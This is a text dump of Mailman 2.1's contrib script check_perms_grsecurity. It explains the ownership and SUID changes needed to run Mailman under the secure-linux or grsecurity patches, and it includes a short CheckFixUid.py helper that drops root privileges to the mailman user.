files >> //proc/self/root/usr/share/doc/mailman-2.1.12/contrib/check_perms_grsecurity.pyc

Fixes for running Mailman under the `secure-linux' patch or grsecurity.

Run check_perms -f and only then check_perms_grsecurity.py -f.
Note that you will have to re-run this script after a mailman upgrade, and
that check_perms will undo part of what this script does.

If you use Solar Designer's secure-linux patch, it prevents a process from
linking (hard link) to a file it doesn't own.
Grsecurity (http://grsecurity.net/) can have the same restriction depending
on how it was built, along with other restrictions such as preventing you
from running a program located in a directory writable by a non-root user.

As a result Mailman has to be changed so that the whole tree is owned by
Mailman, and the CGIs and some of the programs in the bin tree (the ones
that lock config.pck files) are SUID Mailman. The idea is that config.pck
files have to be owned by the mailman UID and only touched by programs that
are UID mailman.
At the same time, we have to make sure that at least 3 directories under
~mailman aren't writable by mailman: mail, cgi-bin, and bin.

Binary commands that are changed to be SUID mailman are also made unreadable
and unrunnable by people who aren't in the mailman group. This shouldn't
affect much since most of those commands would fail to work if you weren't
part of the mailman group anyway.
Scripts in ~mailman/bin/ are not made suid or sgid; they need to be run by
user mailman or root to work.

Marc <marc_soft@merlins.org>/<marc_bts@vasoftware.com>
2000/10/27 - Initial version for secure_linux/openwall and mailman 2.0
2001/12/09 - Updated version for grsecurity and mailman 2.1
The compiled script embeds the following CheckFixUid.py source as a string, which it writes out as a file:

import sys
import os
import grp, pwd
from Mailman.mm_cfg import MAILMAN_USER, MAILMAN_GROUP

class CheckFixUid:
    uid = pwd.getpwnam(MAILMAN_USER)[2]
    gid = grp.getgrnam(MAILMAN_GROUP)[2]
    if os.geteuid() == 0:
        os.setgid(gid)
        os.setuid(uid)
    if os.geteuid() != uid:
        print "You need to run this script as root or mailman because it was configured to run"
        print "on a linux system with a security patch which restricts hard links"
        sys.exit()